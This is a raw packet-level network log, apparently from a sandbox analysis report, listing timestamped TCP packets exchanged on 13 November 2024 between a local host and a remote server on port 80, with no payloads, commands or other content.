                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716028929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716034889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716113091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716140032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716156006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716171980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716187954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716202974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716206074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716242075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753087997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753103018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753154993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753212929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753230095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753245115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753261089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753267050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753278971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753294945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753326893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753365040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753379107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753405094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753417969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753418922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753434896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.753460884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.755887032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.755918980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.755933046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756000996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756016970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756031990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756047010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756062031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756089926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756114960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756138086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756155968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756170988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756186962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756201029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756220102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756289959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756303072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756318092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756334066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756347895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756366014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756381035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756551981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756567001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756582975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756597996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756684065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.756700039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.761167049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.785912037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.785924911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.785948992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.785963058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.785969019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.785978079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.785993099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.785994053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786010981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786040068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786067963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786083937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786112070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786149025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786164045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786179066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786195993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786199093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786212921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786223888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786227942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786243916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786252975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786259890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786297083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786312103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786335945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786350965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786365986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786411047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786411047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786411047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786411047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786426067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786500931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786544085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786561012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786586046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786628962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786643028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786663055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786681890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786688089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786695957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.786741018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.792177916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.792242050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.792256117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.792279959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.792282104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.792295933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.792313099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.812994957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813044071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813049078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813062906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813087940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813102961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813102961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813132048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813157082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813170910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813174009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.813196898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814394951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814410925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814424992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814450979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814472914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814487934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814505100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814521074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814537048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814548016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814553976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.814584017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821208000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821232080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821249962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821394920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821409941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821424961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821445942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821449041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821463108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821477890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821477890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821492910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821590900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821607113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821621895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821631908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821639061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821659088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821664095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821680069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821695089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821707964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821732044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821743965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821748018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821763992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821779966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821789980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821795940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821810961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821826935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821830034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821855068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821856022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821873903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821890116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821901083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821923018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.821999073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822015047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822030067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822045088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822058916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822072029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822074890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822091103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822098970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822105885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822107077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822133064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822144985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822149992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822165966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822181940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822182894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822197914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822212934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822226048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822227955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822243929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822254896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822271109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822283030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822288036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822304010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822319984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822329044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822335958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822350979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822350979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822366953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822396040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822408915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822424889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822438955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822452068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822453976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822468996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822484016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822498083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822500944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822513103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822521925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822537899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822555065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822560072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822573900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822581053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822598934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822613955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822613955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822643042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822659016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822664976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822674990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822690964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822693110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822709084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822724104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822735071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822740078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822756052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822768927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822802067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822938919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822952986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822967052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822983027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822994947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.822998047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823014975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823016882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823029995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823045015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823056936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823071003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823086023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823098898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823107958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823115110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823122978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823132038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823147058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823151112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823163033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823177099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823182106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823206902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823219061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823234081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823247910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823250055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823263884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823278904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823293924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823333979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823333979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823333979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823349953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823375940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823395014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823400021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823417902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823431969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823434114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823470116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823477030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823493004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823509932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823523045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823538065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823560953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823570967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.823596954 CET804973342.96.10.8192.168.2.4
